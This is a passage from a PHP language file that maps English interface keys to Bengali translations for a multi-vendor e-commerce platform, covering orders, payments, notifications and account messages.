ডেম্যান্ডেড', 'most_demanded_product' => 'সর্বাধিক চাহিদা পণ্য', 'most_demanded_product_update_successfully' => 'সর্বাধিক ডেম্যান্ডেড করা পণ্য আপডেট সফলভাবে', 'most_demanded_table' => 'সর্বাধিক চাহিদা টেবিল', 'most_favorite' => 'মোস্ট ফেভারিট', 'most_loved' => 'সর্বাধিক প্রিয়', 'most_popular_products' => 'সর্বাধিক জনপ্রিয় পণ্য', 'most_rated_products' => 'সর্বাধিক রেটেড পণ্য', 'most_searching' => 'সর্বাধিক সার্চ', 'most_visited_categories' => 'সর্বাধিক পরিদর্শন ক্যাটাগরি', 'msg91_sms' => 'এমএসজি 91 এসএমএস', 'multi_vendor' => 'মাল্টি বিক্রেতা', 'multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => 'একাধিক জিপ কোডগুলি কমা পৃথক করে বা এন্টার বোতাম টিপে ইনপুট করা যেতে পারে', 'multiply_with_QTY' => 'পরিমান দিয়ে গুণ করুন', 'must on' => 'অবশ্যই অবশ্যই', 'must_on' => 'অবশ্যই অবশ্যই', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right' => 'প্রথমে রঙ অনুসারে চিত্রগুলি আপলোড করতে হবে। রঙ চিত্র ক্যাটাগরিে ডানদিকে দেখানো হয়েছে', 'must_upload_colour_wise_images_first._Colour_is_shown_in_the_image_section_top_right.' => 'প্রথমে রঙ অনুসারে চিত্রগুলি আপলোড করতে হবে। রঙ চিত্রের উপরে ডানদিকে দেখানো হয়েছে।', 'my product' => 'আমার পণ্য', 'my_Order' => 'আমার অর্ডার', 'my_Order_List' => 'আমার অর্ডার তালিকা', 'my_Wallet' => 'আমার ওয়ালেট ', 'my_Wishlists' => 'আমার উইশ লিস্ট', 'my_address' => 'আমার ঠিকানা', 'my_bank_info' => 'আমার ব্যাংক তথ্য', 'my_cart' => 'আমার কার্ট', 'my_compare_list' => 'আমার কম্পেয়ার তালিকা', 'my_loyalty_point' => 'আমার লয়াল্টি পয়েন্ট', 'my_order' => 'আমার অর্ডার', 'my_order_details' => 'আমার অর্ডার ডিটেলস', 'my_profile' => 'আমার প্রোফাইল', 'my_shop' => 'আমার দোকান', 'my_shop_info' => 'আমার দোকানের তথ্য', 'my_support_tickets' => 'আমার সাপোর্ট টিকিট', 'my_wallet' => 'আমার ওয়ালেট ', 'my_wishlist' => 'আমার উইশ লিস্ট', 'my_wishlists' => 'আমার উইশ লিস্ট', 'name' => 'নাম', 'nav_menu' => 'নাভ মেনু', 'need_product_approval' => 'পণ্য অনুমোদনের প্রয়োজন', 'negative' => 'নেতিবাচক', 'neutral' => 'নিরপেক্ষ', 'new' => 'নতুন', 'new product' => 'নতুন পণ্য', 'new product 2023' => 'নতুন পণ্য 2023', 'new shop digital product' => 'নতুন শপ ডিজিটাল পণ্য', 'new_Category' => 'নতুন ক্যাটাগরি', 'new_Product' => 'নতুন পণ্য', 'new_Products' => 'নতুন পণ্য', 'new_Products_Requests' => 'নতুন পণ্য অনুরোধ', 'new_arrival' => 'নতুন আগমন', 'new_arrivals' => 'নতুন আগমন', 'new_language' => 'নতুন ভাষা', 'new_notification' => 'নতুন নোটিফিকেশন', 'new_order' => 'নতুন অর্ডার', 'new_password' => 'নতুন পাসওয়ার্ড', 'new_product' => 'নতুন পণ্য', 'new_seller' => 'নতুন বিক্রেতা', 'new_shipping_cost' => 'নতুন শিপিং ব্যয়', 'newsletter' => 'নিউজলেটার', 'neww seller product' => 'নতুন বিক্রেতা পণ্য', 'nexmo_sms' => 'নেক্সমো এসএমএস', 'next' => 'পরবর্তী', 'nid' => 'না', 'no' => 'না', 'no more review ' => 'আর রিভিউ নেই', 'no more review remain to load' => 'আর কোনও রিভিউ লোড নেই', 'no.' => 'নং', 'no_' => 'না', 'no_Account' => 'কোন অ্যাকাউন্ট', 'no_Color' => 'রঙ নেই', 'no_Rating' => 'অমূল্য', 'no_account' => 'কোন অ্যাকাউন্ট নেই', 'no_account_Sign_up_now' => 'এখন কোনও অ্যাকাউন্ট সাইন আপ নেই', 'no_address_is_saved' => 'কোনও ঠিকানা সেভ করা হয় না', 'no_attachment_found' => 'কোনও সংযুক্তি পাওয়া যায় নি', 'no_billing_address_found' => 'কোনও বিলিং ঠিকানা পাওয়া যায় নি', 'no_color' => 'রঙ নেই', 'no_color_available' => 'কোনও রঙ পাওয়া যায় নি', 'no_comment_found' => 'কোন মন্তব্য পাওয়া যায় না', 'no_conversation_found' => 'কোনও কথোপকথন পাওয়া যায় নি', 'no_country_found' => 'কোন দেশ খুঁজে পাওয়া যায় না', 'no_country_to_deliver' => 'ডেলিভারি করার মতো কোনও দেশ নেই', 'no_customer_found' => 'কোনও গ্রাহক খুঁজে পাওয়া যায় না', 'no_data_found' => 'কোনও ডেটা পাওয়া যায় নি', 'no_data_to_found' => 'কোনও ডেটা খুঁজে পাওয়া যায় নি', 'no_data_to_show' => 'দেখানোর জন্য কোনও ডেটা নেই', 'no_delivery_man_assigned' => 'কোনও ডেলিভারি ম্যান নিযুক্ত করা হয়নি', 'no_delivery_man_assigned_yet' => 'এখনও কোনও ডেলিভারি ম্যান নিযুক্ত করা হয়নি', 'no_discount' => 'ছাড় নেই', 'no_items_in_basket' => 'জুড়িতে কোনও আইটেম নেই', 'no_location_found' => 'কোনও লোকেশন পাওয়া যায় না', 'no_message_available' => 'কোন মেসেজ এভেইল্যাবলে', 'no_more_review_remain_to_load' => 'আর কোনও রিভিউ লোড করার জন্য নেই', 'no_order_found' => 'কোন অর্ডার পাওয়া যায় না', 'no_products_added_yet' => 'কোনো পণ্য সংযোজিত এখনও', 'no_rating' => 'অমূল্য', 'no_review' => 'কোন রিভিউ', 'no_shipping_address_found' => 'কোনও শিপিংয়ের ঠিকানা পাওয়া যায় নি', 'no_shipping_method_selected' => 'কোনও শিপিং পদ্ধতি নির্বাচন করা হয়নি', 'no_similar_products_found' => 'অনুরূপ কোনও পণ্য পাওয়া যায় নি', 'no_thanks' => 'না ধন্যবাদ', 'no_transaction_found' => 'কোনও ট্রান্সেকশন পাওয়া যায় নি', 'no_zip_code_found' => 'কোনও জিপ কোড পাওয়া যায় নি', 'not' => 'না', 'not match' => 'মিলে না', 'not_assign_yet' => 'এখনও আসসাইন না', 'not_assigned' => 'নির্ধারিত না', 'not_available' => 'পাওয়া যায় না', 'not_found' => 'পাওয়া যায় নি', 'not_found_anything' => 'কিছু খুঁজে পাওয়া যায় নি', 'not_match' => 'মিলে না', 'not_reviewed_yet' => 'এখনও রিভিউ করা হয়নি', 'note' => 'বিঃদ্রঃ', 'note_from_seller' => 'বিক্রেতার কাছ থেকে নোট', 'notification' => 'নোটিফিকেশন', 'notification deleted successfully' => 'নোটিফিকেশন সফলভাবে মুছে ফেলা হয়েছে', 'notification_count' => 'নোটিফিকেশন গণনা', 'notification_deleted_successfully' => 'নোটিফিকেশন সফলভাবে মুছে ফেলা হয়েছে', 'notifications' => 'নোটিফিকেশন', 'notificatios' => 'নোটিফিকেশন', 'notify_All_the_Sellers' => 'সমস্ত বিক্রেতাকে অবহিত করুন', 'now' => 'এখন', 'now_copy' => 'এখন অনুলিপি', 'now_go_to' => 'এখন যেতে', 'now_you_can_login' => 'এখন আপনি লগইন করতে পারেন', 'now_youll_be_successfully_able_to_use_the_addons_for_your_6Valley_website' => 'এখন আপনি সফলভাবে আপনার 6 ভ্যালি ওয়েবসাইটের জন্য অ্যাডনগুলি ব্যবহার করতে এনাবল হবেন', 'now_youll_be_successfully_able_to_use_the_theme_for_your' => 'এখন আপনার জন্য থিমটি সফলভাবে ব্যবহার করতে এনাবল হবেন', 'now_youll_be_successfully_able_to_use_the_theme_for_your_6Valley_website' => 'এখন আপনি আপনার 6 ভ্যালি ওয়েবসাইটের জন্য থিমটি সফলভাবে ব্যবহার করতে এনাবল হবেন', 'now_you’ll_be_successfully_able_to_use_the_theme_for_your' => 'এখন আপনি সফলভাবে ব্যবহার করতে পারবেন থিম আপনার জন্য', 'number' => 'সংখ্যা', 'oR_SHARE' => 'বা শেয়ার করুন', 'oder_Transaction_Statement' => 'ওডিআর ট্রান্সেকশন স্টেটমেন্ট', 'of' => 'এর', 'off' => 'বন্ধ', 'offer_ends_in' => 'অফার শেষ', 'offers' => 'অফার', 'offers_&_Deals' => 'অফার এন্ড ডিল', 'offers_and_events' => 'অফার এন্ড ইভেন্ট', 'office' => 'দপ্তর', 'offline' => 'অফলাইন', 'offline payment' => 'অফলাইন পেমেন্ট', 'offline_Payment' => 'অফলাইন পেমেন্ট', 'offline_Payment_Method' => 'অফলাইন পেমেন্ট পদ্ধতি', 'offline_Payment_Methods' => 'অফলাইন পেমেন্ট পদ্ধতি', 'offline_Payment_allows_customers_to_use_external_payment_methods._They_must_share_payment_details_with_the_seller_afterward._Admin_can_set_whether_customers_can_make_offline_payments_by_enabling/disabling_this_button. ' => 'অফলাইন পেমেন্ট গ্রাহকদের বাহ্যিক অর্থ পেমেন্ট পদ্ধতি ব্যবহার করতে দেয়। তাদের অবশ্যই পরে বিক্রেতার সাথে অর্থ পেমেন্ট ডিটেলসটি শেয়ার করতে হবে। অ্যাডমিন এই বোতামটি এনাবল/ডিস্যাবল করে অফলাইন অর্থ পেমেন্ট করতে পারে কিনা তা অ্যাডমিন সেট করতে পারেন।', 'offline_Payments' => 'অফলাইন পেমেন্ট', 'offline_payment' => 'অফলাইন পেমেন্ট', 'offline_payment_method_added_successfully' => 'অফলাইন পেমেন্ট পদ্ধতি সফলভাবে যুক্ত হয়েছে', 'offline_payment_method_delete_successfully' => 'অফলাইন পেমেন্ট পদ্ধতি সফলভাবে মুছবেন', 'offline_payment_method_not_found' => 'অফলাইন পেমেন্ট পদ্ধতি পাওয়া যায় নি', 'offline_payment_method_update_successfully' => 'অফলাইন পেমেন্ট পদ্ধতি আপডেট সফলভাবে', 'offline_payments' => 'অফলাইন পেমেন্ট', 'offline_seller' => 'অফলাইন বিক্রেতা', 'ok' => 'ঠিক আছে', 'old' => 'পুরানো', 'on' => 'চালু', 'on_product' => 'পণ্য উপর', 'on_vacation' => 'ছুটিতে', 'on_vacation_mode' => 'ভ্যাকেশন মোডে', 'once_deleted_you_will_not_be_able_to_recover_this' => 'একবার মুছে ফেললে আপনি এটি পুনরুদ্ধার করতে এনাবল হবেন না', 'once_you_delete' => 'একবার আপনি মুছবেন', 'once_you_have_downloaded_and_filled_the_format_file' => 'একবার আপনি ফর্ম্যাট ফাইলটি ডাউনলোড এন্ড পূরণ করেছেন', 'one_step_ahead' => 'এক ধাপ এগিয়ে', 'one_time_password' => 'এক সময় পাসওয়ার্ড', 'ongoing' => 'চলমান', 'ongoing_Orders' => 'চলমান অর্ডার', 'online_Shopping' => 'অনলাইনে কেনাকাটা', 'online_seller' => 'অনলাইন বিক্রেতা', 'online_shopping' => 'অনলাইনে কেনাকাটা', 'only_Admin_can_create_an_account_for_any_seller' => 'কেবলমাত্র অ্যাডমিন যে কোনও বিক্রেতার জন্য একটি অ্যাকাউন্ট তৈরি করতে পারেন', 'only_available_when_order_is_out_for_delivery' => 'অর্ডার ডেলিভারি জন্য বাইরে থাকলে কেবল তখনই এভেইল্যাবলে', 'only_earning_point_can_converted_to_wallet_money' => 'কেবল উপার্জন পয়েন্ট ওয়ালেটের অর্থের সাথে রূপান্তর করতে পারে', 'only_the_Admin_Panel_&_Seller_Panel_will_be_functional' => 'কেবল অ্যাডমিন প্যানেল এন্ড বিক্রেতা প্যানেল কার্যকরী হবে', 'open' => 'খোলা', 'open_your_and_start_selling.' => 'আপনার খুলুন এন্ড বিক্রয় শুরু করুন।', 'open_your_shop_and_start_selling.' => 'আপনার দোকান খুলুন এন্ড বিক্রি শুরু করুন।', 'optional' => 'ঐচ্ছিক', 'optional please provide embed link not direct link' => 'ঐচ্ছিক দয়া করে এম্বেড লিঙ্কটি সরাসরি লিঙ্ক নয়', 'optional please provide embed link not direct link.' => 'ঐচ্ছিক দয়া করে এম্বেড লিঙ্কটি পেমেন্ট করুন, সরাসরি লিঙ্ক নয়।', 'optional_please_provide_embed_link_not_direct_link' => ' ঐচ্ছিক দয়া করে এম্বেড লিঙ্কটি দিন, সরাসরি লিঙ্ক নয়', 'or_continue_with' => 'বা চালিয়ে যান', 'or_some_coupons_are_for_all_sellers' => 'বা কিছু কুপন সমস্ত বিক্রেতার জন্য', 'or_you_have_any_other_questions' => 'অথবা আপনার অন্য কোনও প্রশ্ন আছে', 'order' => 'অর্ডার', 'order details' => 'অর্ডার ডিটেলস', 'order expected deliv...' => 'অর্ডার প্রত্যাশিত ডেলিভ ...', 'order is already delivered' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়', 'order payment' => 'অর্ডার পেমেন্ট', 'order place' => 'অর্ডার জায়গা', 'order refund' => 'অর্ডার রিফান্ড', 'order status histori...' => 'অর্ডার স্ট্যাটাস হিস্টোরিয়া ...', 'order transactions' => 'অর্ডার ট্রান্সেকশন', 'order wise' => 'অর্ডার ', 'order wise seller shipping' => 'অর্ডার ওয়াইজ বিক্রেতা শিপিং', 'order wise shipping' => 'অর্ডার শিপিং', 'order wise shipping cost' => 'অর্ডার ওয়াইজ শিপিং ব্যয়', 'order wise shipping method Status সফলভাবে আপডেট করা হয়েছে৷' => 'অর্ডার ওয়াইজ শিপিং পদ্ধতির স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'order_&_Shipping_Info' => 'অর্ডার এন্ড শিপিংয়ের তথ্য', 'order_Amount' => 'অর্ডার পরিমাণ', 'order_Canceled' => 'অর্ডার ক্যানসেল', 'order_Complete' => 'সম্পূর্ণ অর্ডার', 'order_Confirmation_Message' => 'অর্ডার নিশ্চিতকরণ মেসেজ', 'order_Date' => 'অর্ডারের তারিখ', 'order_Delivered_Message' => 'অর্ডার ডেলিভারি মেসেজ', 'order_Delivery_Verification' => 'অর্ডার ডেলিভারি ভেরিফিকেশন', 'order_Details' => 'অর্ডার ডিটেলস', 'order_Failed_Message' => 'অর্ডার ব্যর্থ মেসেজ', 'order_ID' => 'অর্ডার আইডি', 'order_Info' => 'অর্ডার তথ্য', 'order_Invoice' => 'প্রিন্ট অর্ডার', 'order_List' => 'অর্ডার তালিকা', 'order_No' => 'অর্ডার নং', 'order_Packaging_Message' => 'প্যাকেজিং মেসেজ অর্ডার করুন', 'order_Pending_Message' => 'পেন্ডিং মেসেজ অর্ডার', 'order_Placed_Successfully' => 'অর্ডার সফলভাবে প্লেস হয়েছে', 'order_Report' => 'অর্ডার রিপোর্ট', 'order_Returned_Message' => 'অর্ডার ফিরে আসা মেসেজ', 'order_Settings' => 'অর্ডার সেটিংস', 'order_Shipped' => 'অর্ডার শিপড', 'order_Statistics' => 'অর্ডার পরিসংখ্যান', 'order_Status' => 'অর্ডারের স্ট্যাটাস', 'order_Table' => 'অর্ডার টেবিল', 'order_Transaction_Statement' => 'অর্ডার ট্রান্সেকশন স্টেটমেন্ট', 'order_Transactions' => 'অর্ডার ট্রান্সেকশন', 'order_Type' => 'অর্ডার মত', 'order_Verification' => 'অর্ডার ভেরিফিকেশন', 'order_again' => 'আবার অর্ডার', 'order_amount' => 'অর্ডার পরিমাণ', 'order_can_be_canceled_only_when_pending.' => 'অর্ডার পেন্ডিং কেবল ক্যানসেল করা যেতে পারে।', 'order_canceled' => 'অর্ডার ক্যানসেল', 'order_canceled_message' => 'অর্ডার ক্যানসেল মেসেজ', 'order_canceled_successfully' => 'অর্ডার সফলভাবে ক্যানসেল', 'order_complete' => 'সম্পূর্ণ অর্ডার', 'order_created_at' => 'অর্ডার তৈরি', 'order_date' => 'অর্ডারের তারিখ', 'order_delivered' => 'অর্ডার ডেলিভারি', 'order_details' => 'অর্ডার ডিটেলস', 'order_details_id' => 'অর্ডার ডিটেলস আইডি', 'order_failed_!_Sorry_we_can`t_complete_your_order' => 'অর্ডার ব্যর্থ! দুঃখিত আমরা আপনার অর্ডার শেষ করতে পারি না', 'order_filter_success' => 'অর্ডার ফিল্টার সফল', 'order_hasbeen_cancelled' => 'অর্ডার ক্যানসেল', 'order_id' => 'অর্ডার আইডি', 'order_info' => 'অর্ডার তথ্য', 'order_invoice' => 'প্রিন্ট অর্ডার', 'order_is_already_delivered.' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়।', 'order_is_already_delivered_and_transaction_amount_has_been_disbursed_changing_status_can_be_the_reason_of_miscalculation' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়েছে এন্ড ট্রান্সেকশন পরিমাণ ডেলিভারি করা হয়েছে পরিবর্তনের স্ট্যাটাস ভুল গণনা করার কারণ হতে পারে', 'order_is_already_delivered_you_can_not_change_it' => 'অর্ডার ইতিমধ্যে ডেলিভারি করা হয়েছে আপনি এটি পরিবর্তন করতে পারবেন না', 'order_is_on_the_way' => 'অর্ডার চলছে', 'order_list' => 'অর্ডার তালিকা', 'order_management' => 'নির্দেশ ব্যাবস্থাপনা', 'order_no' => 'অর্ডার নং', 'order_note' => 'অর্ডার নোট', 'order_out_for_delivery_Message' => 'ডেলিভারি মেসেজর জন্য অর্ডার আউট', 'order_place' => 'অর্ডার স্থাপন', 'order_placed' => 'অর্ডার স্থাপন', 'order_placed_successfully' => 'অর্ডার সফলভাবে প্লেস হয়েছে', 'order_refund' => 'অর্ডার রিফান্ড', 'order_refunded_message' => 'অর্ডার রিফান্ড মেসেজ', 'order_returned._Product_Successfully_Returned' => 'অর্ডার ফিরে। পণ্য সফলভাবে ফিরে এসেছে', 'order_settings' => 'অর্ডার সেটিংস', 'order_sort_by_(high_to_low)' => 'অর্ডার বাছাই করুন (উচ্চ থেকে নিম্ন)', 'order_sort_by_(low_to_high)' => 'অর্ডার বাছাই করুন (নিম্ন থেকে উচ্চ)', 'order_status' => 'অর্ডারের স্ট্যাটাস', 'order_status_returned._Product_Successfully_Returned' => 'অর্ডার স্ট্যাটাস ফিরে। পণ্য সফলভাবে ফিরে এসেছে', 'order_summary' => 'অর্ডার সংক্ষিপ্তসার', 'order_table' => 'অর্ডার টেবিল', 'order_transactions' => 'অর্ডার ট্রান্সেকশন', 'order_type' => 'অর্ডার টাইপ', 'order_verification' => 'অর্ডার ভেরিফিকেশন', 'order_verification_code' => 'অর্ডার ভেরিফিকেশন কোড', 'order_wise' => 'অর্ডার ', 'order_wise_shipping_method' => 'অর্ডার ওয়াইজ শিপিং পদ্ধতি', 'order_wise_shipping_method_Status_updated_successfully' => 'অর্ডার ওয়াইজ শিপিং পদ্ধতির স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'order_wise_shipping_method_status_updated_successfully' => 'অর্ডার ওয়াইজ শিপিং পদ্ধতির স্ট্যাটাস সফলভাবে আপডেট হয়েছে', 'orders' => 'অর্ডার', 'orders_Served' => 'অর্ডার পরিবেশন', 'other' => 'অন্য', 'other_stores' => 'অন্যান্য স্টোর', 'other_wise_these_section_data_would_not_function_properly_in_website_and_user_apps' => 'অন্যান্য এই ক্যাটাগরি ডেটা ওয়েবসাইট এন্ড ব্যবহারকারী অ্যাপ্লিকেশনগুলিতে সঠিকভাবে কাজ করবে না', 'others' => 'অন্যান্য', 'others_store' => 'অন্যরা ষ্টোর', 'otp_not_found' => 'ওটিপি পাওয়া যায় নি', 'otp_template' => 'ওটিপি টেমপ্লেট', 'out_For_Delivery' => 'ডেলিভারি জন্য আউট', 'out_for_delivery' => 'আউট ফর ডেলিভারি', 'out_for_delivery_orders' => 'আউট ফর ডেলিভারি অর্ডার', 'out_of_Stock' => 'স্টক বাইরে', 'out_of_stock' => 'স্টক বাইরে', 'out_of_stock!' => 'স্টক বাইরে!', 'overall_Statistics' => 'সামগ্রিক পরিসংখ্যান', 'overall_statistics' => 'সামগ্রিক পরিসংখ্যান', 'overview' => 'ওভারভিউ', 'packaging' => 'প্যাকেজিং', 'packaging_order' => 'প্যাকেজিং অর্ডার', 'page_Not_found' => 'পৃষ্ঠা খুঁজে পাওয়া যায়নি', 'page_setup' => 'পাতা ঠিক করা', 'pages' => 'পৃষ্ঠাগুলি', 'pagination' => 'পৃষ্ঠা', 'pagination_settings' => 'পৃষ্ঠা সেটিংস', 'paid' => 'প্রদত্ত', 'paid_By' => 'পেমেন্ট দ্বারা পেমেন্ট', 'paid_by' => 'পেইড বাই', 'paid_phone_number' => 'প্রদত্ত ফোন নম্বর', 'paid_to' => 'পেইড টু', 'partner_request' => 'অংশীদার অনুরোধ', 'passport' => 'পাসপোর্ট', 'password' => 'পাসওয়ার্ড', 'password Must Be 6 Character' => 'পাসওয়ার্ড অবশ্যই 6 টি অক্ষর হতে হবে', 'password_Must_Be_6_Character' => 'পাসওয়ার্ড অবশ্যই 6 টি অক্ষর হতে হবে', 'password_does_not_match' => 'পাসওয়ার্ড মেলে না', 'password_doesn t_Match' => 'পাসওয়ার্ড মেলে না', 'password_doesn t_match' => 'পাসওয়ার্ড মেলে না', 'password_minimum_8_characters' => 'পাসওয়ার্ড সর্বনিম্ন 8 অক্ষর', 'passwords_do_not_match' => 'পাসওয়ার্ড মিলছে না', 'passwords_match' => 'পাসওয়ার্ড মিলছে', 'paste in the input filed below and' => 'নীচের ইনপুট ফিল্ডটিতে পেস্ট করুন', 'paste_in_the_input_filed_below_and' => 'নীচে দায়ের করা ইনপুটটিতে পেস্ট করুন', 'paste_script' => 'স্ক্রিপ্ট পেস্ট করুন', 'pay by wallet' => 'ওয়ালেট দ্বারা পেমেন্ট', 'pay_by_wallet' => 'ওয়ালেট দ্বারা পেমেন্ট', 'pay_with_secure_Digital_payment_gateways' => 'সুরক্ষিত ডিজিটাল পেমেন্ট গেটওয়ে দিয়ে অর্থ পেমেন্ট করুন', 'pay_your_bill_using_any_of_the_payment_method_below_and_input_the_required_information_in_the_form' => 'নীচে যে কোনও অর্থ পেমেন্ট পদ্ধতি ব্যবহার করে আপনার বিলটি পেমেন্ট করুন এন্ড ফর্মটিতে প্রয়োজনীয় তথ্য ইনপুট করুন', 'payer_id' => 'পেমেন্টকারী আইডি', 'payer_info' => 'পেমেন্টকারীর তথ্য', 'payer_name' => 'পেমেন্টকারীর নাম', 'payment' => 'অর্থ পেমেন্ট', 'paymentUrl' => 'পেমেন্টরল', 'payment_By' => 'দ্বারা পেমেন্ট', 'payment_Info' => 'পেমেন্ট তথ্য', 'payment_Information' => 'পেমেন্ট তথ্য', 'payment_Method' => 'মূল্যপরিশোধ পদ্ধতি', 'payment_Method_Name' => 'পেমেন্ট পদ্ধতির নাম', 'payment_Methods' => 'মুল্য পরিশোধ পদ্ধতি', 'payment_Note' => 'পেমেন্ট নোট', 'payment_Reference' => 'পেমেন্ট রেফারেন্স', 'payment_Statistics' => 'অর্থ পেমেন্ট পরিসংখ্যান', 'payment_Status' => 'ট্রান্সেকশন স্ট্যাটাস', 'payment_Url' => 'পেমেন্ট ইউআরএল', 'payment_by' => 'দ্বারা পেমেন্ট', 'payment_details' => 'পেমেন্ট ডিটেলস', 'payment_for' => 'জন্য অর্থ পেমেন্ট', 'payment_gateway_configuration' => 'পেমেন্ট গেটওয়ে কনফিগারেশন', 'payment_gateway_title' => 'পেমেন্ট গেটওয়ে শিরোনাম', 'payment_info' => 'পেমেন্ট তথ্য', 'payment_method' => 'মূল্যপরিশোধ পদ্ধতি', 'payment_method_info' => 'অর্থ পেমেন্ট পদ্ধতি তথ্য', 'payment_methods' => 'মুল্য পরিশোধ পদ্ধতি', 'payment_note' => 'পেমেন্ট নোট', 'payment_option' => 'পেমেন্ট অপশন', 'payment_receiver_id' => 'পেমেন্ট রিসিভার আইডি', 'payment_setup' => 'পেমেন্ট সেটআপ', 'payment_status' => 'পেমেন্ট স্ট্যাটাস', 'payments' => 'অর্থ পেমেন্ট', 'payments_Amount' => 'পেমেন্টের পরিমাণ', 'paymob_accept' => 'Paymob গ্রহণ', 'paymob_supports_EGP_currency' => 'PAYMOB EGP মুদ্রা সাপোর্ট করে', 'paypal' => 'পেপাল', 'paypal_Secret' => 'পেপাল সিক্রেট', 'paystack' => 'পে -স্ট্যাক', 'paytabs' => 'Paytabs', 'paytabs invoices' => 'পেটিএবিএস প্রিন্ট', 'paytm' => 'পেটিএম', 'paytm_merchant_key' => 'পেটিএম বণিক কী', 'paytm_merchant_mid' => 'পেটিএম বণিক মিড', 'paytm_merchant_website' => 'পেটিএম বণিক ওয়েবসাইট', 'pc' => 'পিসি', 'pc_' => 'পিসি', 'pending' => 'পেন্ডিং', 'pending_Products' => 'পেন্ডিং পণ্য', 'pending_Refund_Requests' => 'পেন্ডিং রিফান্ডের অনুরোধগুলি', 'pending_Request' => 'অনুরোধ অপেক্ষামান', 'pending_Withdraw' => 'পেন্ডিং উইথড্র', 'pending_Withdraws' => 'পেন্ডিং উইথড্র', 'pending_amount' => 'পেন্ডিং পরিমাণ', 'pending_withdraw' => 'পেন্ডিং উইথড্র', 'percent' => 'শতাংশ', 'percentage' => 'শতাংশ', 'percentage (%)' => 'শতাংশ (%)', 'percentage_of_loyalty_point_on_order_amount' => 'অর্ডার পরিমাণের লয়াল্টি পয়েন্টের শতাংশ', 'permanent' => 'স্থায়ী', 'persentage (%)' => 'অবিচ্ছিন্ন (%)', 'personal_details' => 'ব্যক্তিগত ডিটেলস', 'phone' => 'ফোন', 'phone (OTP)' => 'ফোন (ওটিপি)', 'phone_name' => 'ফোন নাম', 'phone_number' => 'ফোন নম্বর', 'phone_number_already_has_been_taken' => 'ইতিমধ্যে ফোন নম্বর নেওয়া হয়েছে', 'physical' => 'ফিজিক্যাল', 'pinterest' => 'Pinterest', 'pixel_analytics_script' => 'পিক্সেল অ্যানালিটিক্স স্ক্রিপ্ট', 'pixel_analytics_script_from_facebook' => 'ফেসবুক থেকে পিক্সেল অ্যানালিটিক্স স্ক্রিপ্ট', 'pixel_analytics_your_pixel_id' => 'পিক্সেল অ্যানালিটিক্স আপনার পিক্সেল আইডি', 'pixel_analytics_your_pixel_id_from_facebook' => 'পিক্সেল বিশ্লেষণ ফেসবুক থেকে আপনার পিক্সেল আইডি', 'place_Holder' => 'স্থান ধারক', 'place_Order' => 'অর্ডার রাখুন', 'placeholder' => 'স্থানধারক', 'placeholder_text' => 'স্থানধারক টেক্সট', 'play_store_download_link' => 'প্লে স্টোর ডাউনলোড লিঙ্ক', 'please' => 'অনুগ্রহ', 'please input the right ids.' => 'দয়া করে সঠিক আইডি ইনপুট করুন।', 'please write the message' => 'মেসেজ লিখুন দয়া করে', 'please!!' => 'অনুগ্রহ!!', 'please_ReType_Password' => 'দয়া করে পাসওয়ার্ড পুনরায় টাইপ করুন', 'please_Verify_that_its_you' => 'দয়া করে যাচাই করুন যে এটি আপনার।', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for' => 'দয়া করে মনে করিয়ে দিন যে আপনাকে এই ক্যাটাগরি জন্য ডেটা সেটআপ করতে হবে', 'please_be_reminded_that_you_have_to_setup_data_for_these_section_for_aster_theme.' => 'দয়া করে মনে করিয়ে দিন যে আপনাকে অ্যাস্টার থিমের জন্য এই ক্যাটাগরি জন্য ডেটা সেটআপ করতে হবে।', 'please_check_the_recaptcha' => 'দয়া করে রেকাপ্টচা চেক করুন', 'please_check_your_SMS_for_OTP' => 'ওটিপির জন্য আপনার এসএমএস চেক করুন', 'please_choose_all_the_options' => 'সমস্ত বিকল্প পছন্দ করুন', 'please_click_save_information_button_below_to_save_all_the_changes' => 'সমস্ত পরিবর্তন সেভ করতে দয়া করে নীচের তথ্য বোতাম সেভ করুন ক্লিক করুন', 'please_click_the_Save_button_below_to_save_all_the_changes' => 'সমস্ত পরিবর্তনগুলি সেভ করতে দয়া করে নীচের সেভ বোতামটি ক্লিক করুন', 'please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'আপনার ব্যাংক অ্যাকাউন্টের মাধ্যমে অর্থ পেমেন্ট জন্য আপনার যাচাই করা অ্যাকাউন্টটি নিশ্চিত করুন', 'please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'আপনার বেতন নিশ্চিত করতে এন্ড আপনার অর্ডার পেতে দয়া করে ডেলিভারিম্যানের সাথে যোগাযোগ করুন।', 'please_do_not_forget_to_notify_your_sellers_about_these_changes.' => 'এই পরিবর্তনগুলি সম্পর্কে আপনার বিক্রেতাদের অবহিত করতে ভুলবেন না।', 'please_enter_valid_email_address' => 'ভ্যালিড ইমেইল ঠিকানা লিখুন', 'please_enter_your_email_to_send_a_verification_code_for_forget_password' => 'ভুলে যাওয়া পাসওয়ার্ডের জন্য একটি ভেরিফিকেশন কোড প্রেরণ করতে দয়া করে আপনার ইমেলটি প্রদান করান', 'please_enter_your_first_name' => 'আপনার প্রথম নাম লিখুন দয়া করে', 'please_enter_your_last_name' => 'তোমার নামের শেষ অংশ লিখুন', 'please_enter_your_phone_number' => 'অনুগ্রহ করে আপনার ফোন নাম্বারটি প্রদান করুন', 'please_enter_zip_code' => 'জিপ কোড লিখুন দয়া করে', 'please_fill_out_this_field' => 'অনুগ্রহ করে এই ঘরটি পুরন কর', 'please_go_back_to_the_homepage' => 'দয়া করে হোমপেজে ফিরে যান', 'please_make_sure' => 'দয়া করে নিশ্চিত করুন', 'please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'দয়া করে নিশ্চিত করুন যে সমস্ত পণ্য সরবরাহের চার্জ আপ টু ডেট রয়েছে।', 'please_make_sure_all_the product`s_delivery_charges_are_up_to_date.' => 'দয়া করে নিশ্চিত করুন যে সমস্ত পণ্যের ডেলিভারি চার্জ আপ টু ডেট রয়েছে।', 'please_only_input_png_or_jpg_type_file' => 'দয়া করে কেবল পিএনজি বা জেপিজি টাইপ ফাইল ইনপুট করুন', 'please_provide_coupon_code' => 'দয়া করে কুপন কোড সরবরাহ করুন', 'please_provide_embed_link_not_direct_link' => 'দয়া করে এম্বেড 